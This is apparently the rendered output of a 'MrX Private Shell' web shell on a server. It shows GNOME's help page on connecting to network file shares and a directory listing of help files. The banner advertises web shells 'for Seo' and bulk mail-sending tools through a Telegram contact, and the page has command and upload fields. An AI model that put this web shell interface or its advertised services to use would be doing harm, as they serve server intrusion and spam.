__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<page xmlns="http://projectmallard.org/1.0/"
      type="topic" style="task"
      id="nautilus-connect">

  <info>
    <link type="guide" xref="files#more-file-tasks"/>
    <link type="guide" xref="sharing"/>

    <revision pkgversion="3.6.0" date="2012-10-06" status="review"/>
    <revision pkgversion="3.12" date="2014-03-23" status="candidate"/>
    <revision pkgversion="3.14" date="2014-10-12" status="candidate"/>
    <revision pkgversion="3.18" date="2015-09-29" status="candidate"/>

    <credit type="author">
      <name>Shaun McCance</name>
      <email>[email protected]</email>
    </credit>
    <credit type="editor">
      <name>Michael Hill</name>
      <email>[email protected]</email>
    </credit>
    <credit type="editor">
      <name>David King</name>
      <email>[email protected]</email>
    </credit>

    <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/>

    <desc>View and edit files on another computer over FTP, SSH, Windows
    shares, or WebDAV.</desc>

  </info>

<title>Browse files on a server or network share</title>

<comment>
  <cite date="2015-09-28">shaunm</cite>
  <p>We can now get network shares for the 'Files' service in GOA
  providers like Google and ownCloud. Put a note in here mentioning
  that you can use that instead for certain services. Maybe link to
  <link xref="accounts-which-application"/>?</p>
</comment>

<p>You can connect to a server or network share to browse and
view files on that server, exactly as if they were on your
own computer. This is a convenient way to download or upload
files on the internet, or to share files with other people on
your local network.</p>

<p>To browse files over the network, open the <app>Files</app>
application from the <gui>Activities</gui> overview, and click
<gui>Other Locations</gui> in the sidebar. The file manager
will find any computers on your local area network that advertise
their ability to serve files. If you want to connect to a server
on the internet, or if you do not see the computer you’re looking
for, you can manually connect to a server by typing in its
internet/network address.</p>

<steps>
  <title>Connect to a file server</title>
  <item><p>In the file manager, click <gui>Other Locations</gui> in the
   sidebar.</p>
  </item>
  <item><p>In <gui>Connect to Server</gui>, enter the address of the server, in
  the form of a
   <link xref="#urls">URL</link>. Details on supported URLs are
   <link xref="#types">listed below</link>.</p>
  <note>
    <p>If you have connected to the server before, you can click on it in the
    <gui>Recent Servers</gui> list.</p>
  </note>
  </item>
  <item>
    <p>Click <gui>Connect</gui>. The files on the server will be shown. You
    can browse the files just as you would for those on your own computer. The
    server will also be added to the sidebar so you can access it quickly in
    the future.</p>
  </item>
</steps>

<section id="urls">
 <title>Writing URLs</title>

<p>A <em>URL</em>, or <em>uniform resource locator</em>, is a form of address
 that refers to a location or file on a network. The address is formatted like this:</p>
  <example>
    <p><sys>scheme://servername.example.com/folder</sys></p>
  </example>
<p>The <em>scheme</em> specifies the protocol or type of server. The
  <em>example.com</em> portion of the address is called the <em>domain name</em>.
  If a username is required, it is inserted before the server name:</p>
  <example>
    <p><sys>scheme://[email protected]/folder</sys></p>
  </example>
<p>Some schemes require the port number to be specified. Insert it after the domain name:</p>
  <example>
    <p><sys>scheme://servername.example.com:port/folder</sys></p>
  </example>
<p>Below are specific examples for the various server types that are supported.</p>
</section>

<section id="types">
 <title>Types of servers</title>

<p>You can connect to different types of servers. Some servers are public,
   and allow anybody to connect. Other servers require you to log in with a
   username and password.</p>
<p>You may not have permissions to perform certain actions on files on a server.
  For example, on public FTP sites, you will probably not be able to delete
  files.</p>
<p>The URL you enter depends on the protocol that the
  server uses to export its file shares.</p>
<terms>
<item>
  <title>SSH</title>
  <p>If you have a <em>secure shell</em> account on a server, you
  can connect using this method. Many web hosts provide SSH accounts
  to members so they can securely upload files. SSH servers always
  require you to log in.</p>
  <p>A typical SSH URL looks like this:</p>
  <example>
    <p><sys>ssh://[email protected]/folder</sys></p>
  </example>

  <comment><cite>shaunm</cite><p>We should have a topics on encryption
  keys, possibly rolling the seahorse help into gnome-help. Then link
  from here.</p></comment>

  <p>When using SSH, all the data you send (including your password)
  is encrypted so that other users on your network can’t see it.</p>
</item>
<item>
  <title>FTP (with login)</title>
  <p>FTP is a popular way to exchange files on the Internet.
  Because data is not encrypted over FTP, many servers now provide
  access through SSH. Some servers, however, still allow or require
  you to use FTP to upload or download files. FTP sites with logins
  will usually allow you to delete and upload files.</p>
  <p>A typical FTP URL looks like this:</p>
  <example>
    <p><sys>ftp://[email protected]/path/</sys></p>
  </example>
</item>
<item>
  <title>Public FTP</title>
  <p>Sites that allow you to download files will sometimes provide
  public or anonymous FTP access. These servers do not require a
  username and password, and will usually not allow you to delete
  or upload files.</p>
  <p>A typical anonymous FTP URL looks like this:</p>
  <example>
    <p><sys>ftp://ftp.example.com/path/</sys></p>
  </example>
  <p>Some anonymous FTP sites require you to log in with a
  public username and password, or with a public username using
  your email address as the password. For these servers, use the
  <gui>FTP (with login)</gui> method, and use the credentials
  specified by the FTP site.</p>
</item>
<item>
  <title>Windows share</title>
  <p>Windows computers use a proprietary protocol to share files over a local
  area network. Computers on a Windows network are sometimes grouped into
  <em>domains</em> for organization and to better control access. If you have
  the right permissions on the remote computer, you can connect to a Windows
  share from the file manager.</p>
  <p>A typical Windows share URL looks like this:</p>
  <example>
    <p><sys>smb://servername/Share</sys></p>
  </example>
</item>
<item>
  <title>WebDAV and Secure WebDAV</title>
  <p>Based on the HTTP protocol used on the web, WebDAV is sometimes used to
  share files on a local network and to store files on the internet. If the
  server you’re connecting to supports secure connections, you should choose
  this option. Secure WebDAV uses strong SSL encryption, so that other users
  can’t see your password.</p>
  <p>A WebDAV URL looks like this:</p>
  <example>
    <p><sys>dav://example.hostname.com/path</sys></p>
  </example>
  <comment>
    <cite date="2012-02-19">shaunm</cite>
    <p>Also used by gnome-user-share, but we're not talking about that
    in gnome-help for 3.0. Hopefully it will be better integrated in 3.2,
    and we can discuss it better in the help. If that happens, link from
    here.</p>
  </comment>
</item>
<item>
  <title>NFS share</title>
  <p>UNIX computers traditionally use the Network File System protocol to
  share files over a local network. With NFS, security is based on the UID of
  the user accessing the share, so no authentication credentials are
  needed when connecting.</p>
  <p>A typical NFS share URL looks like this:</p>
  <example>
    <p><sys>nfs://servername/path</sys></p>
  </example>
</item>
</terms>
</section>

</page>

Filemanager

Name Type Size Permission Actions
figures Folder 0755
a11y-bouncekeys.page File 2.78 KB 0644
a11y-braille.page File 1.45 KB 0644
a11y-contrast.page File 2.18 KB 0644
a11y-dwellclick.page File 3.33 KB 0644
a11y-font-size.page File 2.27 KB 0644
a11y-icon.page File 2.27 KB 0644
a11y-mag.page File 2.85 KB 0644
a11y-right-click.page File 3.16 KB 0644
a11y-screen-reader.page File 2.28 KB 0644
a11y-slowkeys.page File 3.21 KB 0644
a11y-stickykeys.page File 4.04 KB 0644
a11y-visualalert.page File 2.51 KB 0644
a11y.page File 2.28 KB 0644
about-hardware.page File 1.57 KB 0644
about-hostname.page File 1.58 KB 0644
about-os.page File 1.64 KB 0644
about-this-guide.page File 1.97 KB 0644
about.page File 871 B 0644
accounts-add.page File 3.21 KB 0644
accounts-disable-service.page File 2.45 KB 0644
accounts-provider-not-available.page File 1.34 KB 0644
accounts-remove.page File 2.63 KB 0644
accounts-which-application.page File 4.01 KB 0644
accounts-whyadd.page File 1.59 KB 0644
accounts.page File 1 KB 0644
addremove-creator.page File 1.97 KB 0644
addremove-install-synaptic.page File 2.68 KB 0644
addremove-install.page File 2.56 KB 0644
addremove-ppa.page File 2.18 KB 0644
addremove-remove.page File 2.55 KB 0644
addremove-sources.page File 2.4 KB 0644
addremove.page File 749 B 0644
app-cheese.page File 870 B 0644
backup-check.page File 1.77 KB 0644
backup-frequency.page File 1.97 KB 0644
backup-how.page File 2.44 KB 0644
backup-restore.page File 1.29 KB 0644
backup-thinkabout.page File 3.24 KB 0644
backup-what.page File 2.45 KB 0644
backup-where.page File 2.21 KB 0644
backup-why.page File 1.23 KB 0644
bluetooth-connect-device.page File 3.96 KB 0644
bluetooth-device-specific-pairing.page File 3.69 KB 0644
bluetooth-problem-connecting.page File 3.31 KB 0644
bluetooth-remove-connection.page File 2.39 KB 0644
bluetooth-send-file.page File 3.17 KB 0644
bluetooth-turn-on-off.page File 3.13 KB 0644
bluetooth-visibility.page File 2.46 KB 0644
bluetooth.page File 2.25 KB 0644
clock-calendar.page File 2.52 KB 0644
clock-set.page File 2.28 KB 0644
clock-timezone.page File 2.38 KB 0644
clock-world.page File 2.08 KB 0644
clock.page File 666 B 0644
color-assignprofiles.page File 2.51 KB 0644
color-calibrate-camera.page File 1.53 KB 0644
color-calibrate-printer.page File 1.57 KB 0644
color-calibrate-scanner.page File 2.36 KB 0644
color-calibrate-screen.page File 2.45 KB 0644
color-calibrationcharacterization.page File 2.55 KB 0644
color-calibrationdevices.page File 819 B 0644
color-calibrationtargets.page File 1.21 KB 0644
color-canshareprofiles.page File 1.62 KB 0644
color-gettingprofiles.page File 1.46 KB 0644
color-howtoimport.page File 2.23 KB 0644
color-missingvcgt.page File 1.09 KB 0644
color-notifications.page File 1.97 KB 0644
color-notspecifiededid.page File 1.27 KB 0644
color-testing.page File 3.14 KB 0644
color-whatisprofile.page File 1.26 KB 0644
color-whatisspace.page File 3.67 KB 0644
color-why-calibrate.page File 1.38 KB 0644
color-whyimportant.page File 3.57 KB 0644
color.page File 828 B 0644
community-support.page File 1.08 KB 0644
contacts-add-remove.page File 2.41 KB 0644
contacts-connect.page File 2.02 KB 0644
contacts-edit-details.page File 2.47 KB 0644
contacts-link-unlink.page File 2.67 KB 0644
contacts-search.page File 1.66 KB 0644
contacts-setup.page File 1.99 KB 0644
contacts.page File 734 B 0644
disk-benchmark.page File 3.01 KB 0644
disk-capacity.page File 3.65 KB 0644
disk-check.page File 2.91 KB 0644
disk-format.page File 2.78 KB 0644
disk-partitions.page File 3.18 KB 0644
disk-repair.page File 4.54 KB 0644
disk-resize.page File 2.84 KB 0644
disk.page File 572 B 0644
display-blank.page File 1.96 KB 0644
display-brightness.page File 2.44 KB 0644
display-dual-monitors.page File 5.53 KB 0644
display-night-light.page File 1.98 KB 0644
files-autorun.page File 5.7 KB 0644
files-browse.page File 3.75 KB 0644
files-copy.page File 4.08 KB 0644
files-delete.page File 3.2 KB 0644
files-disc-write.page File 1.22 KB 0644
files-hidden.page File 3.59 KB 0644
files-lost.page File 2.28 KB 0644
files-open.page File 3.17 KB 0644
files-preview.page File 1.96 KB 0644
files-recover.page File 2.3 KB 0644
files-removedrive.page File 2.74 KB 0644
files-rename-multiple.page File 3.62 KB 0644
files-rename-music-metadata.page File 1.95 KB 0644
files-rename.page File 4.46 KB 0644
files-search.page File 5.3 KB 0644
files-select.page File 2 KB 0644
files-share.page File 2.4 KB 0644
files-sort.page File 3.64 KB 0644
files-templates.page File 2.34 KB 0644
files-tilde.page File 1.8 KB 0644
files.page File 1.79 KB 0644
get-involved.page File 1.29 KB 0644
gnome-classic.page File 5.25 KB 0644
gnome-on-ubuntu.page File 1.94 KB 0644
gnome-version.page File 1.41 KB 0644
hardware-auth.page File 548 B 0644
hardware-cardreader.page File 2.84 KB 0644
hardware-driver.page File 1.67 KB 0644
hardware-problems-graphics.page File 661 B 0644
hardware.page File 1.06 KB 0644
index.page File 1.11 KB 0644
keyboard-cursor-blink.page File 2.03 KB 0644
keyboard-key-menu.page File 2.48 KB 0644
keyboard-key-super.page File 2.34 KB 0644
keyboard-layouts.page File 6.18 KB 0644
keyboard-nav.page File 9.74 KB 0644
keyboard-osk.page File 3.12 KB 0644
keyboard-repeat-keys.page File 2.37 KB 0644
keyboard-shortcuts-set.page File 16.5 KB 0644
keyboard.page File 1.16 KB 0644
legal.xml File 295 B 0644
look-background.page File 4.14 KB 0644
look-display-fuzzy.page File 2.63 KB 0644
look-resolution.page File 5.62 KB 0644
media.page File 1.37 KB 0644
more-help.page File 878 B 0644
mouse-doubleclick.page File 2.54 KB 0644
mouse-lefthanded.page File 1.88 KB 0644
mouse-middleclick.page File 2.88 KB 0644
mouse-mousekeys.page File 3.87 KB 0644
mouse-problem-notmoving.page File 3.45 KB 0644
mouse-sensitivity.page File 2.13 KB 0644
mouse-touchpad-click.page File 7.78 KB 0644
mouse-wakeup.page File 1.36 KB 0644
mouse.page File 1.56 KB 0644
music-cantplay-drm.page File 1.92 KB 0644
nautilus-behavior.page File 3.46 KB 0644
nautilus-bookmarks-edit.page File 2.41 KB 0644
nautilus-connect.page File 7.81 KB 0644
nautilus-display.page File 2.85 KB 0644
nautilus-file-properties-basic.page File 4.53 KB 0644
nautilus-file-properties-permissions.page File 4.37 KB 0644
nautilus-list.page File 5.1 KB 0644
nautilus-prefs.page File 686 B 0644
nautilus-preview.page File 2.45 KB 0644
nautilus-views.page File 2.15 KB 0644
net-antivirus.page File 1.79 KB 0644
net-browser.page File 603 B 0644
net-default-browser.page File 2.15 KB 0644
net-default-email.page File 2.07 KB 0644
net-email-virus.page File 1.88 KB 0644
net-email.page File 928 B 0644
net-findip.page File 3.63 KB 0644
net-firewall-on-off.page File 2.67 KB 0644
net-firewall-ports.page File 2.56 KB 0644
net-fixed-ip-address.page File 3.46 KB 0644
net-general.page File 854 B 0644
net-macaddress.page File 2.64 KB 0644
net-manual.page File 3.57 KB 0644
net-mobile.page File 2.99 KB 0644
net-othersconnect.page File 2.63 KB 0644
net-othersedit.page File 3.23 KB 0644
net-problem.page File 641 B 0644
net-proxy.page File 3.29 KB 0644
net-security-tips.page File 3.03 KB 0644
net-security.page File 699 B 0644
net-slow.page File 3.64 KB 0644
net-vpn-connect.page File 4.09 KB 0644
net-what-is-ip-address.page File 1.83 KB 0644
net-wired-connect.page File 2.62 KB 0644
net-wired.page File 575 B 0644
net-wireless-adhoc.page File 2.93 KB 0644
net-wireless-airplane.page File 2.26 KB 0644
net-wireless-connect.page File 4.27 KB 0644
net-wireless-disconnecting.page File 3.49 KB 0644
net-wireless-find.page File 2.36 KB 0644
net-wireless-hidden.page File 2.97 KB 0644
net-wireless-noconnection.page File 3.05 KB 0644
net-wireless-troubleshooting-device-drivers.page File 4.33 KB 0644
net-wireless-troubleshooting-hardware-check.page File 7.33 KB 0644
net-wireless-troubleshooting-hardware-info.page File 2.76 KB 0644
net-wireless-troubleshooting-initial-check.page File 3.46 KB 0644
net-wireless-troubleshooting.page File 2.42 KB 0644
net-wireless-wepwpa.page File 1.49 KB 0644
net-wireless.page File 1.07 KB 0644
net-wrongnetwork.page File 1.94 KB 0644
net.page File 998 B 0644
numeric-keypad.page File 1.24 KB 0644
parental-controls.page File 6.99 KB 0644
power-autobrightness.page File 1.44 KB 0644
power-autosuspend.page File 1.61 KB 0644
power-batteryestimate.page File 2.72 KB 0644
power-batterylife.page File 4.29 KB 0644
power-batteryoptimal.page File 2.07 KB 0644
power-batteryslow.page File 1.15 KB 0644
power-batterywindows.page File 2.15 KB 0644
power-closelid.page File 3.52 KB 0644
power-constantfan.page File 1.88 KB 0644
power-hotcomputer.page File 2.81 KB 0644
power-lowpower.page File 1.55 KB 0644
power-nowireless.page File 2.45 KB 0644
power-othercountry.page File 2.04 KB 0644
power-percentage.page File 1.36 KB 0644
power-profile.page File 1.9 KB 0644
power-status.page File 2.24 KB 0644
power-suspend.page File 1.9 KB 0644
power-suspendfail.page File 2.95 KB 0644
power-whydim.page File 2.06 KB 0644
power-willnotturnon.page File 3.1 KB 0644
power-wireless.page File 1.45 KB 0644
power.page File 1.39 KB 0644
prefs-display.page File 783 B 0644
prefs-language-install.page File 2.14 KB 0644
prefs-language.page File 667 B 0644
prefs-sharing.page File 880 B 0644
prefs.page File 1.28 KB 0644
printing-2sided.page File 1.76 KB 0644
printing-booklet-duplex.page File 3.01 KB 0644
printing-booklet-singlesided.page File 3.5 KB 0644
printing-booklet.page File 1.79 KB 0644
printing-cancel-job.page File 3.21 KB 0644
printing-differentsize.page File 1.92 KB 0644
printing-envelopes.page File 2.3 KB 0644
printing-inklevel.page File 1.97 KB 0644
printing-name-location.page File 3.4 KB 0644
printing-order.page File 2.08 KB 0644
printing-paperjam.page File 1.38 KB 0644
printing-select.page File 1.35 KB 0644
printing-setup-default-printer.page File 2.41 KB 0644
printing-setup.page File 3.71 KB 0644
printing-streaks.page File 2 KB 0644
printing-to-file.page File 2.06 KB 0644
printing.page File 1.29 KB 0644
privacy-history-recent-off.page File 3.22 KB 0644
privacy-location.page File 1.95 KB 0644
privacy-purge.page File 3.09 KB 0644
privacy-screen-lock.page File 3.51 KB 0644
privacy.page File 1.29 KB 0644
quick-settings.page File 4.43 KB 0644
remote-login.page File 4.85 KB 0644
report-ubuntu-bug.page File 3.2 KB 0644
screen-shot-record.page File 6.92 KB 0644
session-fingerprint.page File 3.85 KB 0644
session-formats.page File 2.56 KB 0644
session-language.page File 3.53 KB 0644
session-screenlocks.page File 2.3 KB 0644
sharing-bluetooth.page File 2.02 KB 0644
sharing-desktop.page File 8.08 KB 0644
sharing-media.page File 3.4 KB 0644
sharing-personal.page File 4.16 KB 0644
sharing-secure-shell.page File 1.6 KB 0644
sharing.page File 573 B 0644
shell-apps-favorites.page File 2.25 KB 0644
shell-apps-open.page File 4.35 KB 0644
shell-exit.page File 5.99 KB 0644
shell-introduction.page File 9.4 KB 0644
shell-keyboard-shortcuts.page File 8.45 KB 0644
shell-lockscreen.page File 1.99 KB 0644
shell-notifications.page File 4.89 KB 0644
shell-overview.page File 1.23 KB 0644
shell-wellbeing.page File 4.72 KB 0644
shell-windows-lost.page File 2.59 KB 0644
shell-windows-maximize.page File 1.92 KB 0644
shell-windows-states.page File 2.3 KB 0644
shell-windows-switching.page File 3.09 KB 0644
shell-windows-tiled.page File 1.39 KB 0644
shell-windows.page File 2.69 KB 0644
shell-workspaces-movewindow.page File 3.84 KB 0644
shell-workspaces-switch.page File 3.01 KB 0644
shell-workspaces.page File 3.58 KB 0644
sound-alert.page File 1.97 KB 0644
sound-broken.page File 1.02 KB 0644
sound-crackle.page File 2.27 KB 0644
sound-nosound.page File 5.21 KB 0644
sound-usemic.page File 2.33 KB 0644
sound-usespeakers.page File 2.53 KB 0644
sound-volume.page File 3.07 KB 0644
startup-applications.page File 1.54 KB 0644
status-icons.page File 20.03 KB 0644
tips-specialchars.page File 6.14 KB 0644
tips.page File 598 B 0644
touchscreen-gestures.page File 3.98 KB 0644
user-accounts.page File 1.51 KB 0644
user-add.page File 3.98 KB 0644
user-admin-change.page File 2.6 KB 0644
user-admin-explain.page File 4.19 KB 0644
user-admin-problems.page File 1.77 KB 0644
user-autologin.page File 2.32 KB 0644
user-changepassword.page File 3.88 KB 0644
user-changepicture.page File 2.89 KB 0644
user-delete.page File 2.74 KB 0644
user-goodpassword.page File 4.01 KB 0644
video-dvd-restricted.page File 1.76 KB 0644
video-dvd.page File 2.9 KB 0644
video-sending.page File 3.14 KB 0644
wacom-left-handed.page File 1.42 KB 0644
wacom-map-buttons.page File 1.74 KB 0644
wacom-mode.page File 1.8 KB 0644
wacom-multi-monitor.page File 2.11 KB 0644
wacom-stylus.page File 2.09 KB 0644
wacom-tablet-unknown.page File 1.69 KB 0644
wacom.page File 965 B 0644
Filemanager